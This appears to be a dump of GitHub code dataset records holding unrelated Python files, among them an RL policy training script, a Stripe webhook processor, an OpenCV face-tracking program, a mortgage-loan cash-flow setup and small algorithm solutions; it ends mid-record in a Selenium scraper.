0.99\n\n model_path = './init/Acrobot_policy.pth'\n\n elif args.env == 'MountainCar':\n env = GarageEnv(env_name='MountainCarContinuous-v0')\n\n batch_size = 50000\n max_length = 500\n\n minibatch_size = 512\n vf_minibatch = 512\n name = 'MountainCar'\n\n lr = 0.0175\n c = 6000\n w = 1\n\n discount = 0.99\n grad_factor = 0.00002\n\n if args.type == 'Diag':\n lr = 0.016\n g_max = 1.0\n c = 12000\n lam = 4e-4\n grad_factor = 0.00002\n else:\n\n g_max = 0.10\n lam = 0.001 * (3.0/args.pow)*4\n n_epochs = 150\n model_path = './init/MountainCar_policy.pth'\n\n elif args.env == 'Swim':\n # Reacher - v2\n env = GarageEnv(env_name='Swimmer-v2')\n env = NormalizedEnv(env, normalize_obs=True, normalize_reward=False,)\n batch_size = 50000\n max_length = 500\n n_epochs = 200\n # n_timestep = 5e5\n # n_counts = 5\n\n minibatch_size = 4096\n vf_minibatch = 512\n\n\n # grad_factor = 100\n\n vf_lr=2e-4\n # batchsize:50\n mf = 0.4 / 0.5\n lr = 0.5*mf\n c = 40*((1/mf)**2)*0.75\n w = 1\n m_lower = 0.6\n lam = 6e-3\n sch = CosLR(lam, T_max=n_epochs)\n\n\n g_max = 0.1\n discount = 0.99\n\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Swim_Policy.pth'\n name = 'Swim'\n\n elif args.env == 'Walker':\n env = GarageEnv(env_name='Walker2d-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 2048\n vf_minibatch = 512\n n_epochs = 200\n\n th = 1.2\n\n lr = 0.5\n c = 50\n w = 1\n lam = 0.0025\n\n g_max = 1.0\n discount = 0.99\n loss_clip = True\n # entropy_method = 'regularized'\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Walker_Policy.pth'\n name = args.env\n elif args.env == 'Reacher':\n # Reacher - v2\n env = GarageEnv(env_name='Reacher-v2')\n # env = NormalizedEnv(env, normalize_obs=True, normalize_reward=False, )\n batch_size = 50000\n max_length = 500\n n_epochs = 200\n\n minibatch_size = 512\n vf_minibatch = 512\n\n lr = 0.5\n c = 50\n w = 1\n lam = 5e-4\n\n g_max = 1.0\n discount = 0.99\n\n entropy_method = 'no_entropy'\n stop_entropy_gradient = False\n\n model_path = './init/Reacher_Policy.pth'\n name = 'Reacher'\n\n elif args.env == 'DPendulum':\n gymenv = GarageEnv(env_name='InvertedDoublePendulum-v2')\n\n env = gymenv\n\n batch_size = 50000\n max_length = 500\n # n_timestep = 5e5\n # n_counts = 5\n\n minibatch_size = 1024\n vf_minibatch = 256\n\n name = 'DPendulm'\n\n # grad_factor = 100\n th = 1.2\n grad_factor = 7.5e-4\n # batchsize:50\n lr = 0.25\n c = 40*1.5*4\n w = 1\n lam = 0.01\n\n g_max = 0.3\n entropy_method = 'max'\n stop_entropy_gradient = True\n discount = 0.99\n loss_clip=True\n model_path = './init/Pendulum_policy.pth'\n\n elif args.env == 'HalfCheetah':\n env = GarageEnv(env_name='HalfCheetah-v2')\n\n batch_size = 50000\n max_length = 500\n minibatch_size = 512\n n_epochs = 200\n\n lr = 0.5\n c = 50*2\n w = 1\n # lam = 0.0025\n\n lam = 5e-4\n\n g_max = 1.0\n discount = 0.99\n loss_clip = True\n\n model_path = './init/HalfCheetah_Policy.pth'\n name = 'HalfCheetah'\n\n log_dir = './log/BGPO-%s_%s_%d_%d_%.2f.txt' % (args.type, name, batch_size, max_length,args.pow)\n for i in range(n_counts):\n if args.env == 'CartPole':\n\n policy = CategoricalMLPPolicy(env.spec,\n hidden_sizes=[8, 8],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n elif args.env == 'Acrobot':\n policy = CategoricalMLPPolicy(env.spec,\n hidden_sizes=[8, 8],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n\n else:\n policy = GaussianMLPPolicy(env.spec,\n hidden_sizes=[64, 64],\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n print(policy)\n value_function = GaussianMLPValueFunction(env_spec=env.spec,\n hidden_sizes=(32, 32),\n hidden_nonlinearity=torch.tanh,\n output_nonlinearity=None)\n if path.exists(model_path):\n\n policy.load_state_dict(torch.load(model_path))\n else:\n torch.save(policy.state_dict(), model_path)\n\n\n algo = BGPO(env_spec=env.spec,\n policy=policy,\n value_function=value_function,\n max_path_length=max_length,\n dist_type=args.type,\n dist_pow=args.pow,\n discount=discount,\n lam=lam,\n vf_minibatch_size=vf_minibatch,\n minibatch_size = minibatch_size,\n policy_lr=lr,\n vf_lr = vf_lr,\n c=c,\n w=w,\n m_lower = m_lower,\n grad_factor = grad_factor,\n center_adv=False,\n g_max=g_max,\n sch = sch,\n entropy_method=entropy_method,\n stop_entropy_gradient=stop_entropy_gradient,\n log_dir=log_dir\n\n )\n\n runner.setup(algo, env)\n runner.train(n_epochs=n_epochs, batch_size=batch_size)\n\n\nrun_task()","repo_name":"gaosh/BGPO","sub_path":"BGPO_test.py","file_name":"BGPO_test.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"35745408952","text":"# log(n)\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n low, high = 0, len(nums) - 1\n\n while low < high:\n mid = (low + high) // 2\n if nums[mid] < nums[0]:\n high = mid\n else:\n low = mid + 1\n\n if nums[low] < nums[0]:\n return nums[low]\n else:\n return nums[0]\n","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"13_Binary_Search/3. find-minimum-in-rotated-sorted-array.py","file_name":"3. find-minimum-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15737299329","text":"#!/usr/bin/env python\n\nimport localization as lx\nimport serial\nimport csv\nimport matplotlib.pyplot as plt\n\ndef get_uwb_id(data):\n id_idx = data.find('from:')\n if id_idx == -1:\n return None\n id = ''\n while data[id_idx+6] != ' ':\n id += data[id_idx+6]\n id_idx += 1\n return id\n\ndef get_uwb_range(data):\n range_idx = data.find('Range:')\n if range_idx == -1:\n return None\n data_val = (float(data[range_idx+7])) + (float(data[range_idx+9])*0.1) + (float(data[range_idx+10])*0.01)\n return data_val\n\nser = serial.Serial('/dev/ttyUSB0', 115200)\n\nP=lx.Project(mode='3D',solver='LSE')\n\nP.add_anchor('anchore_A',(0,100,50))\nP.add_anchor('anchore_B',(100,100,25))\nP.add_anchor('anchore_C',(100,0,15))\n\nt,label=P.add_target()\n\nt.add_measure('anchore_A',50)\nt.add_measure('anchore_B',50)\nt.add_measure('anchore_C',50)\n\nP.solve()\n\n# Then the target location is:\n\nprint(t.loc)\n","repo_name":"Frederiknoer/RMUAS-Master","sub_path":"loc_py_test.py","file_name":"loc_py_test.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14919496370","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n.. $Id$\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, division\n__docformat__ = \"restructuredtext en\"\n\nlogger = __import__('logging').getLogger(__name__)\n\nimport six\nimport simplejson\n\nfrom requests.structures import CaseInsensitiveDict\n\nfrom zope.event import notify\n\nfrom nti.store.interfaces import PurchaseAttemptFailed\nfrom nti.store.interfaces import PurchaseAttemptDisputed\nfrom nti.store.interfaces import PurchaseAttemptRefunded\nfrom nti.store.interfaces import PurchaseAttemptSuccessful\n\nfrom nti.store.payments.stripe.processor.base import BaseProcessor\n\nfrom nti.store.payments.stripe.utils import create_payment_charge\n\nfrom nti.store.store import get_purchase_attempt\n\n\ndef prepare_json_text(s):\n result = s.decode('utf-8') if isinstance(s, bytes) else s\n return result\n\n\nclass EventProcessor(BaseProcessor):\n\n events = (\"charge.succeeded\", \"charge.refunded\", \"charge.failed\",\n \"charge.dispute.created\", \"charge.dispute.updated\")\n\n def _process(self, event, request=None):\n event_type = event.get('type', None)\n data = CaseInsensitiveDict(event.get('data', {}))\n if event_type in self.events:\n data = data.get('metadata') or {}\n purchase_id = data.get('PurchaseID', u'')\n username = data.get('Username', u'')\n purchase = get_purchase_attempt(purchase_id, username)\n if purchase:\n if event_type in (\"charge.succeeded\") and not purchase.has_succeeded():\n payment_charge = None\n api_key = self.get_api_key(purchase)\n if api_key:\n charges = self.get_charges(purchase_id=purchase_id,\n start_time=purchase.StartTime,\n api_key=api_key)\n if charges:\n payment_charge = create_payment_charge(charges[0])\n else:\n payment_charge = None\n notify(PurchaseAttemptSuccessful(purchase, payment_charge, request))\n elif event_type in (\"charge.refunded\") and not purchase.is_refunded():\n notify(PurchaseAttemptRefunded(purchase))\n elif event_type in (\"charge.failed\") and not purchase.has_failed():\n notify(PurchaseAttemptFailed(purchase))\n elif event_type in (\"charge.dispute.created\", \"charge.dispute.updated\") \\\n and not purchase.is_disputed():\n notify(PurchaseAttemptDisputed(purchase))\n else:\n logger.debug('Unhandled event type (%s)' % event_type)\n\n def _readInput(self, body):\n result = CaseInsensitiveDict()\n values = simplejson.loads(prepare_json_text(body))\n result.update(values)\n return result\n\n def process_event(self, body, request=None):\n try:\n types_ = six.string_types + (six.binary_type,)\n if isinstance(body, types_):\n event = self._readInput(body) \n else:\n event = body\n self._process(event, request)\n return True\n except Exception:\n logger.exception('Error processing stripe event (webhook)')\n return False\n","repo_name":"OpenNTI/nti.store","sub_path":"src/nti/store/payments/stripe/processor/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18710518581","text":"import requests\nimport json\n\n\njson_request = {\n\n 'name': 'کون',\n 'price': '190000',\n\n}\n\n\nsrc = 'http://127.0.0.1:8000/Laser/'\n\nr = requests.post(src + 'edit/laser/area/', json=json_request, headers={'Token':'1'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/LaserApp/EditLaserArea.py","file_name":"EditLaserArea.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36084260352","text":"#!/usr/bin/env python3\n\"\"\"\nConvert pickled data to CSV format.\n\nFor example:\n\n$ scripts/unpickle_to_csv.py -s NC -u vtd\n\nFor documentation, type:\n\n$ scripts/unpickle_to_csv.py -h\n\n\"\"\"\n\nimport argparse\nfrom argparse import ArgumentParser, Namespace\nfrom typing import Any\n\nfrom baseline import *\n\n\ndef parse_args() -> Namespace:\n parser: ArgumentParser = argparse.ArgumentParser(\n description=\"Unpickle data to CSV format.\"\n )\n\n parser.add_argument(\n \"-s\",\n \"--state\",\n default=\"NC\",\n help=\"The two-character state code (e.g., NC)\",\n type=str,\n )\n parser.add_argument(\n \"-u\",\n \"--unit\",\n default=\"vtd\",\n help=\"The unit of granularity (e.g., vtd)\",\n type=str,\n )\n parser.add_argument(\n \"-w\", \"--water\", dest=\"water\", action=\"store_true\", help=\"Water-only precincts\"\n )\n\n parser.add_argument(\n \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose mode\"\n )\n\n args: Namespace = parser.parse_args()\n return args\n\n\ndef main() -> None:\n \"\"\"Convert pickled data to CSV format.\"\"\"\n\n args: Namespace = parse_args()\n\n xx: str = args.state\n unit: str = args.unit\n\n water: bool = args.water\n\n #\n\n assert not water # NOTE - Water-only precincts handled in Todd's baseline code.\n\n #\n\n ### DEBUG ###\n\n ### LOAD DATA ###\n\n rel_path: str = path_to_file([temp_dir]) + file_name(\n [xx, cycle, unit, \"data\"], \"_\", \"pickle\"\n )\n collection: FeatureCollection = FeatureCollection(rel_path)\n\n # Log # of water-only precincts -- DELETE\n\n water_precincts: list = list()\n if water:\n rel_path: str = path_to_file([data_dir, xx]) + file_name(\n [xx, cycle, unit, \"water_only\"], \"_\", \"csv\"\n ) # GEOID,ALAND,AWATER\n types: list = [str, int, int]\n water_precincts = [row[\"GEOID\"] for row in read_csv(rel_path, types)]\n print(f\"# of water-only precincts: {len(water_precincts)}\")\n\n ### WRITE DATA AS A CSV ###\n\n l: list = list()\n for f in collection.features:\n row: dict = {\n \"GEOID\": f[\"geoid\"],\n \"POP\": f[\"pop\"],\n \"X\": f[\"xy\"].x,\n \"Y\": f[\"xy\"].y,\n }\n # Remove water-only precincts -- DELETE\n if f[\"geoid\"] in water_precincts:\n print(f\"Removing water-only precinct {f['geoid']}\")\n continue\n else:\n l.append(row)\n\n rel_path: str = path_to_file([data_dir, xx]) + file_name(\n [xx, cycle, unit, \"data\"], \"_\", \"csv\"\n )\n write_csv(rel_path, l, [\"GEOID\", \"POP\", \"X\", \"Y\"], precision=\"{:.14f}\")\n\n\nclass FeatureCollection:\n \"\"\"Collections of geographic features: precincts (VTDs), tracts, BGs, blocks.\"\"\"\n\n def __init__(self, features_path) -> None:\n self.features: list[Feature] = self._load(features_path)\n self.total_pop: int = 0\n self.avg_pop: int = 0\n\n self._calc_one_time_stats()\n\n def _load(self, rel_path: str) -> list[Feature]:\n unpickled: list[Feature] = read_pickle(rel_path)\n if not unpickled:\n raise Exception(\"Error: FeatureCollection.__init__(): Failed to load data.\")\n\n return unpickled\n\n def _calc_one_time_stats(self) -> None:\n for i, val in enumerate(self.features):\n self.total_pop += val[\"pop\"]\n\n self.avg_pop: int = round(self.total_pop / len(self.features))\n\n def check_feature_sizes(self, ndistricts: int) -> bool:\n \"\"\"Warn if any features are more populous than a target district.\"\"\"\n\n target_pop: int = round(self.total_pop / ndistricts)\n\n for i, val in enumerate(self.features):\n pop: int = val[\"pop\"]\n if pop > target_pop:\n geoid: str = val[\"geoid\"]\n\n print()\n print(\n f\"WARNING: Feature {geoid} has more people ({pop}) than the target district size ({target_pop}).\"\n )\n print()\n\n return False\n\n return True\n\n \"\"\"\n # Handle features more populous than a single district?\n \n for geoID in self.feature_pop:\n pop = self.feature_pop[geoID]\n\n fullreps = pop // self.target_pop\n if fullreps > 0:\n print(\n \"Feature {0} has enough people for {1} full districts.\".format(\n geoID, fullreps\n )\n )\n self.nreps -= fullreps\n self.feature_pop[geoID] -= fullreps * self.target_pop\n \"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n\n### END ###\n","repo_name":"alecramsay/baseline","sub_path":"scripts/unpickle_to_csv.py","file_name":"unpickle_to_csv.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44127007870","text":"#!/usr/bin/env python3\n\n# --------------------------------------------------\n# Alexandre, Bruno, Pedro\n# SAVI, Outubro 2023.\n# --------------------------------------------------\n\n\"\"\"\nConventions\n\nFunctions -> camelCase\n\nVariables -> snake_case\n\nClass -> PascalCase\n\nClass objets -> camelCase\n\n\"\"\"\n# -----------------------------\n# Conventions\n# -----------------------------\n\n# Testing\n\nimport argparse\nimport os\nimport cv2\nfrom copy import deepcopy\nfrom functools import partial\nimport numpy as np\nimport imutils\nimport time\n\nfrom lib.keyboardActions import *\nfrom lib.trackers import Trackers\nfrom lib.createPersonData import createPersonData\nfrom lib.audio_pessoa_desconhecida import play_welcome,name_prompt\nfrom lib.audio_pessoa_conhecida import hello_again\nfrom lib.computeIOU import computeIOU\n\ndef main():\n # -----------------------------\n # Initialization\n # -----------------------------\n # * ---Configuration of argparse----\n parser = argparse.ArgumentParser(description='Human Identifier')\n parser.add_argument('-c', '--cascade', type=int, required=False,\n default=0, help='Defines which Haars cascade to use for detection')\n parser.add_argument('-t', '--tracker', type=str, required=False,\n default=\"kcf\", help='Defines which tracker method to use for tracking')\n parser.add_argument('-v', '--verbose',action='store_true', help='Prints debugging information')\n args = vars(parser.parse_args())\n\n # * Add adjustment parameters here\n trackers_algorigthms = {\n \"csrt\": cv2.TrackerCSRT_create, # Slower but more accurate\n \"kcf\": cv2.TrackerKCF_create, # A bit faster than csrt but less accurate\n \"mosse\": cv2.legacy.TrackerMOSSE_create} # Fastest\n\n # * Creating tracker based on argument parsed\n tracker_type = trackers_algorigthms[args[\"tracker\"]]\n\n\n trackers = Trackers()\n\n cascade_paths = [\"../files/cascades/haarcascade_frontalface_default.xml\",\n \"../files/cascades/haarcascade_frontalface_alt.xml\",\n \"../files/cascades/haarcascade_frontalface_alt2.xml\"\n ]\n\n config = {\"playback_speed\": 30,\n \"cascade\": {\"path\": cascade_paths[args[\"cascade\"]],\n \"scale_factor\": 1.1, # Smaller is more accurate but slower\n \"min_neighbours\": 17}, # More neighbours means more accurate detections\n \"new_face_threshold\": 75,\n \"IOU_threshold\": 0.4,\n \"min_size_face_roi\":90}\n\n yamls_path = '../files/yamls'\n imgs_path = '../files/images'\n\n # * Cleaning old execution files\n for yaml_file in os.listdir(yamls_path):\n yaml_file_path = f'{yamls_path}/{yaml_file}'\n\n os.remove(yaml_file_path)\n\n for img_file in os.listdir(imgs_path):\n img_file_path = f'{imgs_path}/{img_file}'\n\n os.remove(img_file_path)\n\n for sound_file in os.listdir(\".\"):\n if sound_file.endswith(\".mp3\"):\n os.remove(sound_file)\n\n # Camera ID 0 is usually webcam\n cap = cv2.VideoCapture(0)\n\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n\n prev_frame_time = 0\n next_frame_time = 0\n fps = 0\n\n cv2.namedWindow(\"Image GUI\", cv2.WINDOW_NORMAL)\n cv2.resizeWindow(\"Image GUI\", 600, 500)\n # cv2.moveWindow(\"Image GUI\",1080,0)\n\n face_recognizer_model = cv2.face.LBPHFaceRecognizer_create()\n first_train = True\n\n train_labels = []\n train_images = []\n\n last_new_label = 1\n\n # -----------------------------\n # Processing\n # -----------------------------\n while True:\n\n ret, image_source = cap.read()\n\n if not ret:\n print(\"Can't receive frame from camera. Exiting ...\")\n break\n\n # Resizing image for easier handling\n image_source = imutils.resize(image_source, width=600)\n h, w, _ = image_source.shape\n\n image_gui = deepcopy(image_source)\n\n # Converting image to grayscale\n image_gray = cv2.cvtColor(image_source, cv2.COLOR_BGR2GRAY)\n\n # * Detecting\n faces_rois = []\n\n #* Tracked faces each frame\n tracking_rois = []\n # Loading the required haar-cascade xml classifier file\n haar_cascade = cv2.CascadeClassifier(config[\"cascade\"][\"path\"])\n\n # Applying the face detection method on the grayscale image\n faces_rect = haar_cascade.detectMultiScale(image_gray, config[\"cascade\"][\"scale_factor\"], config[\"cascade\"][\"min_neighbours\"])\n\n # Iterating through rectangles of detected faces\n for (x, y, w, h) in faces_rect:\n cv2.rectangle(image_gui, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\n\n if w < config[\"min_size_face_roi\"] or h < config[\"min_size_face_roi\"]:\n continue\n\n faces_rois.append(image_gray[y:y+h, x:x+w])\n\n\n if len(faces_rect) != 0 :\n # * The first face will be on a completly untrained model, which crashes, so the first one has necessarily to be training\n if first_train:\n # person_name = input(\"Hello, whats your name\\n\") \n play_welcome()\n person_name = name_prompt()\n\n if person_name:\n train_labels.append(last_new_label)\n train_images.append(faces_rois[0])\n\n face_recognizer_model.train(train_images, np.array(train_labels))\n\n\n face_recognizer_model.setLabelInfo(last_new_label,person_name)\n\n bbox = faces_rect[0]\n trackers.add(tracker_type,image_source,bbox,last_new_label)\n\n createPersonData(faces_rois[0],last_new_label,face_recognizer_model)\n \n print(f'Saving {person_name} information') \n\n \n last_new_label += 1\n\n first_train = False\n else:\n print(\"False positive, skipping\")\n\n\n\n # * Use the LPB model to predict which face it should be\n\n for face_roi,face_rect in zip(faces_rois,faces_rect):\n \n if first_train:\n break\n\n label, confidence = face_recognizer_model.predict(face_roi)\n if args[\"verbose\"]:\n print(f'\\n\\nLoss is {confidence}')\n print(f'Person identified is {face_recognizer_model.getLabelInfo(label)}')\n\n\n for tracker_dict in trackers.trackers:\n\n # * Check if the detection overlaps any tracker\n\n\n # * Iterate through trackers and see if any non active one matches the label\n if not tracker_dict[\"ready2reInit\"]:\n continue\n\n tracker_label = tracker_dict[\"label\"]\n\n # * Reinitialize tracker\n if tracker_label == label:\n tracker_dict[\"tracker\"] = tracker_type()\n tracker_dict[\"tracker\"].init(image_source,face_rect)\n\n person_name = face_recognizer_model.getLabelInfo(tracker_label)\n hello_again(person_name)\n\n tracker_dict[\"reInit_counter\"] = 0\n tracker_dict[\"ready2reInit\"] = False\n\n # * Initially the untrained model shall not make confident predictions\n # * Thus we can assume all predictions with less than a certain confidence are new faces\n\n #* Find tracker with label detected\n #* Check its IOU\n #* DOnt forget the case if it doens tfind any\n for tracker_dict in trackers.trackers:\n\n intersection_over_union = 0 # if it does not find any\n \n if tracker_dict[\"label\"] != label:\n continue\n\n intersection_over_union = computeIOU(face_rect,tracker_dict[\"bbox\"])\n\n\n if args[\"verbose\"]:\n print(f'IOU of detection and tracking is : {intersection_over_union}')\n\n if confidence > config[\"new_face_threshold\"] and intersection_over_union < config[\"IOU_threshold\"]:\n # if confidence > config[\"new_face_threshold\"]:\n\n\n play_welcome()\n person_name = name_prompt()\n \n if person_name:\n print(\"Adding new face\")\n bbox = face_rect\n trackers.add(tracker_type,image_source,bbox,last_new_label)\n\n\n face_recognizer_model.setLabelInfo(last_new_label,person_name)\n\n face_recognizer_model.update([face_roi], np.asarray([last_new_label])) \n\n createPersonData(face_roi,last_new_label,face_recognizer_model)\n \n print(f'Saving {person_name} information') \n\n last_new_label +=1\n else:\n print(\"False positive, skipping\")\n\n\n # * Tracking\n # check to see if we are currently tracking an object\n if trackers.latest_bboxs is not None:\n # grab the new bounding box coordinates of the object\n (successes, boxes) = trackers.update(image_source,face_recognizer_model)\n\n for track_idx,(success,box) in enumerate(zip(successes,boxes)): \n # check to see if the tracking was a success\n\n if success:\n (x, y, w, h) = [int(v) for v in box]\n tracking_rois.append(image_gray[y:y+h, x:x+w])\n \n # * The tracked face should belong to the same person, hence all the tracked ROI's should be used to train the model\n # * to update the initially random weights\n train_labels.append(trackers.trackers[track_idx][\"label\"])\n train_images.append(tracking_rois[-1])\n \n # ! TRAIN STARTS FROM SCRATCH, I WANT UPDATE()\n face_recognizer_model.update([tracking_rois[-1]], np.array([trackers.trackers[track_idx][\"label\"]]))\n \n # face_recognizer_model.update(np.asarray(train_images)[-1,:,:], trackers.trackers[track_idx][\"label\"]) \n # face_recognizer_model.update([tracking_rois[-1]], np.asarray([trackers.trackers[track_idx][\"label\"]])) \n\n\n label2, confidence2 = face_recognizer_model.predict(tracking_rois[-1])\n label1, confidence1 = face_recognizer_model.predict(face_roi)\n # cv2.imshow(\"Ti1\",train_images[-1])\n # cv2.imshow(\"fr1\",face_roi)\n\n\n # print(f'Tracker ROI')\n # print(f'Confidence is {confidence2}')\n # print(f'Label is {label2}')\n\n # print(f'Face ROI')\n # print(f'Confidence is {confidence1}')\n # print(f'Label is {label1}')\n \n \n\n\n \n\n # -----------------------------\n # Visualization\n # -----------------------------\n\n # *Calculating fps\n next_frame_time = time.time()\n fps = 1/(next_frame_time-prev_frame_time)\n prev_frame_time = next_frame_time\n\n image_gui = cv2.putText(image_gui, f'{fps:.1f} FPS', (20, 20), cv2.FONT_HERSHEY_SIMPLEX,\n 0.7, (0, 255, 0), 2, cv2.LINE_AA)\n\n trackers.draw(image_gui,face_recognizer_model)\n cv2.imshow('Image GUI', image_gui)\n\n keyboardActions(config, image_gui)\n\n # -----------------------------\n # Termination\n # -----------------------------\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"brunofavs/SAVI_TP1","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42835458175","text":"def mais_populoso(dic):\n soma = 0\n maior = 0\n strs = 0\n for i in dic:\n dicionariomunicipio = dic[i]\n for e in dicionariomunicipio:\n soma+= dicionariomunicipio[e]\n if soma>maior:\n maior = soma\n strs = i\n return strs","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_225/ch165_2020_06_11_22_04_34_657874.py","file_name":"ch165_2020_06_11_22_04_34_657874.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1148590041","text":"#실패율이 높은 ~ , 내림차순으로 \nfrom bisect import bisect_left,bisect_right\ndef solution(N, stages):\n result = []\n stages.sort()\n total = len(stages)\n diff_arr = []\n for i in range(1, N+1):\n idx = bisect_left(stages,i)\n idx2 = bisect_right(stages,i)\n diff = idx2 - idx\n if diff == 0:\n diff_arr.append(0)\n else:\n diff_arr.append(diff/total)\n total -= diff\n dic = {}\n for i, v in enumerate(diff_arr):\n dic[i+1] = v\n result = sorted(dic.items(), key=lambda x: -x[1])\n answer = []\n # print(result)\n for a, _ in result:\n answer.append(a)\n # print(answer)\n return answer","repo_name":"julia0926/TIL_Algo","sub_path":"프로그래머스/lv1/42889. 실패율/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11687819052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 1 16:04:12 2021\r\n\r\n@author: ayubh\r\n\"\"\"\r\n\r\nimport Pricing_and_Cashflows as cf\r\nimport pandas as pd\r\nimport random\r\n\r\ndf = pd.read_csv (r\"C:/Users/ayubh/Desktop/MBS MODEL/Loan_Data_1.csv\")\r\ndf.fillna(0, inplace=True)\r\nloan_df = pd.DataFrame(df)\r\n\r\ndef pd_data_frame_columns_to_float(data_frame, field_list):\r\n data_frame[field_list] = data_frame[field_list].astype(float)\r\n return data_frame\r\n\r\ndef generate_adjusted_cdr(row):\r\n change = random_change()\r\n adjusted_cdr = row['constant_default_rate'] * change / 100\r\n\r\n if adjusted_cdr < 0.005:\r\n return 0.005\r\n elif adjusted_cdr > 0.25:\r\n return 0.25\r\n return adjusted_cdr\r\n\r\n\r\ndef generate_adjusted_cpr(row):\r\n adjusted_cpr = row['constant_prepayment_rate'] * random_change(factor_number=5) / 100\r\n if adjusted_cpr > 0.25:\r\n return 0.25\r\n elif adjusted_cpr < 0.05:\r\n return 0.05\r\n return adjusted_cpr\r\n\r\n\r\ndef generate_adjusted_recovery(row):\r\n recovery = row['recovery_percentage'] * random_change(factor_number=1) / 100\r\n if recovery < 0:\r\n return 0.0\r\n elif recovery > 1.0:\r\n return 1.0\r\n return recovery\r\n\r\ndef label_tranche(row):\r\n if row['Lien_Position']==1:\r\n tranche_label=1\r\n else:\r\n tranche_label=2\r\n return tranche_label\r\n\r\ndef random_change(factor_number=3, change_range=5, how_many_chances=5):\r\n change = 0\r\n for i in range(factor_number):\r\n chance = random.randrange(how_many_chances)\r\n if chance == 1:\r\n change += random.uniform(-change_range, change_range)\r\n return 100 + change\r\n\r\n\r\n# Change pandas dtype of the following fields from object to float64.\r\nfield_list = [\r\n 'Current_Principal_Balance',\r\n 'Current_Interest_Rate',\r\n 'Original_Amount'\r\n # 'current_property_value',\r\n # 'deferred_balance',\r\n # 'gross_margin',\r\n # 'junior_lien_balance'\r\n # 'original_appraisal_amount',\r\n # 'original_rate',,\r\n # 'last_payment_received',\r\n # 'original_amount',\r\n # 'reset_index',\r\n # 'senior_lien_balance'\r\n \r\n ]\r\nloan_df = pd_data_frame_columns_to_float(data_frame=loan_df, field_list=field_list)\r\n\r\nloan_df['Original_Term'] = loan_df['Original_Term'].astype(int)\r\nloan_df['Lien_Position'] =loan_df ['Lien_Position']. astype(int)\r\n#senior tranche-> Lien position 1\r\n#junior tranche-> lien position 0 or 2\r\n\r\n# Add default economic assumptions.\r\nloan_df['constant_default_rate'] = float(0.10) / 100\r\n#override this to account for different prepayment speeds\r\nloan_df['constant_prepayment_rate'] = float(0.08) / 100\r\nloan_df['recovery_percentage'] = float(0.05) / 100\r\n\r\nadjusted_cdr_series = loan_df.apply(\r\n generate_adjusted_cdr,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_cdr'] = adjusted_cdr_series\r\n\r\nadjusted_cpr_series = loan_df.apply(\r\n generate_adjusted_cpr,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_cpr'] = adjusted_cpr_series\r\n\r\nadjusted_recovery_series = loan_df.apply(\r\n generate_adjusted_recovery,\r\n axis=1\r\n)\r\n\r\nloan_df['adjusted_recovery'] = adjusted_recovery_series\r\n\r\ntranch_group = loan_df.apply(label_tranche,axis=1)\r\nloan_df['tranch_level']=tranch_group\r\n\r\n\r\n\r\n#This will go in next code file for pricing\r\nx=cf.Loan_Portfolio(0.10,loan_df)\r\ny=x.cash_flows_aggregate_for_portfolio()\r\nz=x.cash_flow_tranchwise(loan_df)\r\nprint(y[\"total_payments\"])\r\n\r\n\r\n\r\n","repo_name":"AyushiVinayB/MBSModel","sub_path":"Full Model/create_Loan_Df.py","file_name":"create_Loan_Df.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"28859845541","text":"import os\nimport time\n\nimport requests\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom tqdm import tqdm\n\nfrom scrapping.normalizer import normalize_image_to_rgb\n\n__authors__ = \"Diaz Chica Luis 